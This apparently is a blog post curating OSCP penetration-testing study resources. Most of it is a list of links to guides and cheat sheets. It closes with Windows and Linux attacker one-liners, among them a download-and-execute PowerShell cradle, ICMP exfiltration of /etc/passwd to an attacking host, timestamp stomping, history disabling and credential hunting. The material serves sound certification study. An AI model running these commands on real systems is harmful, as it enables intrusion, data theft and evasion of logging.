During my journey to getting the OSCP, I have come across many articles, Git repos, videos, and other sources of great and valuable information that have helped me during my studies. While having all of these in a bookmark folder is great, I also wanted to build a curated list of the resources that I've collected over time, all in one place for everyone to access.
This list will continue to grow over time as I come across new resources. If you know more resources or want me to add yours, please let me know and I'll add it in.
PS. A VERY big thank you to all the authors of these resources for taking the time and energy to put this invaluable information together.
OSCP Certification Exam Guide - Offensive Security
31 Days of OSCP Experience - ParanoidNinja
Detailed Guide on OSCP Prep – From Newbie to OSCP - Ramkisan Mohan
Offensive Security Certified Professional – Lab and Exam Review - theslickgeek
Passing The OSCP - Pink_Panther
OSCP Experience and the first torture! - Nitesh Shilpkar
OSCP-like Vulnhub VMs - abatchy
OSCP Training VM’s hosted on Vulnhub.com - Andrew Hilton
Pinky's Palace CTFs - Pink_Panther
Hack The Box OSCP-like VMs - Tony
Search Ippsec's Videos for Specific Topics - ippsec
Hack The Box, Over The Wire, Other CTFs - derekrook
Metasploit Unleashed - Offensive Security
15 Ways to Download a File - NetSPI
Explain Shell - Great at explaining Linux Commands in Detail - Idan Kamara
OWASP Testing Guide v4 Table of Contents - owasp
Penetration Testing Tools Cheat Sheet - Arr0way
Reverse Shell Cheat Sheet - Arr0way
Linux Commands Cheat Sheet - Arr0way
Reverse Shell Cheat Sheet - Pentest Monkey
Black Room Sec - CTFs, Guides, Tools - blackroomsec
Dostoevskylabs's PenTest Notes - Dostoevskylabs
Pentest Compilation - adon90
SecLists - danielmiessler
OSCP-Prep - burntmybagel
OSCP-Prep - rhodejo
OSCP Scripts - garyhooks
OSCP Scripts & Documents - ihack4falafel
OSCP Recon Script - xapax
Cheatsheet-God - OlivierLaflamme
OSCP-Repo - rewardone
Cheatsheets - slyth11907
OSCP tricks - WarLord
Go-For-OSCP - WarLord
How to prepare for the OSCP ? A STUDY PLAN - Magda CHELLY, CISSP, Ph.D
OSCP useful Links - backdoorshell
Total OSCP Guide - sushant747
OSCP Course & Exam Preparation - 411Hall
OSCP Journey: Python Code Challenges - Elias Ibrahim
SMB Enumeration Checklist - 0xdf
Tunneling and Port Forwarding - HackTricks
Post-Exploitation Windows File Transfers with SMB - 0xdf
Multiple Ways to Exploit Tomcat Manager - Raj Chande
PHP Web Shell - WhiteWinterWolf
Msfvenom Cheat Sheet - LucianNitescu
Linux Shells - HackTricks
Windows Shells - HackTricks
Dumping Clear-Text Credentials - Pentestlab
OSCP Exam Report Template in Markdown - noraj
OSCP Omnibus - alexiasa
Brute Force - CheatSheet - HackTricks
Checklist - Linux Privilege Escalation - HackTricks
Checklist - Local Windows Privilege Escalation - HackTricks
Preliminary SQL Injection Part 1 - Jatin Yadav
Preliminary SQL Injection Part 2 - Jatin Yadav
Informix SQL Injection Cheat Sheet - pentestmonkey
MSSQL Injection Cheat Sheet - pentestmonkey
Oracle SQL Injection Cheat Sheet - pentestmonkey
MySQL SQL Injection Cheat Sheet - pentestmonkey
Postgres SQL Injection Cheat Sheet - pentestmonkey
DB2 SQL Injection Cheat Sheet - pentestmonkey
Ingres SQL Injection Cheat Sheet - pentestmonkey
SQL Injection Reference Library & Techniques - SQLINjection
OSCP - Linux Priviledge Escalation - WarLord
Basic Linux Privilege Escalation - g0tmi1k
Linux Priv escalation - carlospolop
Linux Privilege Escalation - HackTricks
OSCP - Windows Priviledge Escalation - WarLord
Awesome-Windows-Exploitation - enddo
Windows Priv escalation - kyawthiha7
Windows Privilege Escalation Fundamentals - FuzzySec (b33f)
Windows Priv escalation - carlospolop
Windows Local Privilege Escalation - HackTricks
PHP Local and Remote File Inclusion (LFI, RFI) Attacks - WarLord
Windows & Linux Exploit Development - FuzzySec (b33f)
Exploit DB - Offensive Security
Exploit Development - Starting from Part 1 - Corelan Team
Over The Wire - Wargames - OverTheWire
Unix Privilege Escalation Exploits - Kabot
Windows Kernel Exploits - SecWiki
Linux Kernel Exploits - lucyoa
Windows Exploit Development – Part 1: The Basics
Windows Exploit Development – Part 2: Intro-Stack-Overflow
Windows Exploit Development – Part 3: Changing-Offsets-and-Rebased-Modules
Windows Exploit Development – Part 4: Locating-Shellcode-Jumps
Windows Exploit Development – Part 5: Locating-Shellcode-Egghunting
Windows Exploit Development – Part 6: Seh-Exploits
Windows Exploit Development – Part 7: Unicode-Buffer-Overflows
Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]
Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]
Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]
Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]
Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]
Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]
~ Windows One-Liners ~ kindredsec
Obtain Permission String from All Services
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths)
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
Forward traffic to an internal host
netsh interface portproxy add v4tov4 listenport=*port* listenaddress=*ip* connectport=*port* connectaddress=*ip*
Download and execute a remote PowerShell script (all in-memory)
iex (New-Object Net.Webclient).DownloadString('*remote_file*')
Check the permissions of all binaries associated with services
$list = Get-WmiObject win32_service | select -ExpandProperty PathName | Select-String -NotMatch svchost; foreach ( $path in $list ) { icacls $path 2>$null | Select-String -NotMatch "Successfully processed" }
Enable RDP (may also need firewall rule)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
~ Linux One-Liners ~ kindredsec
Stomp a timestamp to match other install-time files
touch -a -m -t $(stat -c '%y' /bin/bash | cut -d ":" -f 1,2 | sed 's/[- :]//g') malicious_file.sh
Prevent executed bash commands from being written to a history file
export HISTFILE=/dev/null
Exfiltrate users over ICMP
while read line; do ping -c 1 -p $(echo "$line" | cut -d ":" -f 1,2,3,7 | xxd -ps) my_attacking_host; done < /etc/passwd
Locate MySQL credentials within web files
egrep -ri '(mysql_connect\(|mysqli_connect\(|new mysqli\(|PDO\(\"mysql:)' /var/www/* 2> /dev/null
List all the SUID Binaries on a System
find / -perm -4000 2>/dev/null
Create iptables rules to transparently route traffic destined for a specific port to an internal host
iptables -t nat -A PREROUTING -i *interface* -p tcp --dport *port* -j DNAT --to-destination *remote_ip_address* && iptables -t nat -A POSTROUTING -o *interface* -p tcp --dport *port* -d *remote_ip_address* -j SNAT --to-source *local_ip_address*
List all running processes being run by users other than your current one
ps -elf | grep -v $(whoami)
List all system cronjobs
for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done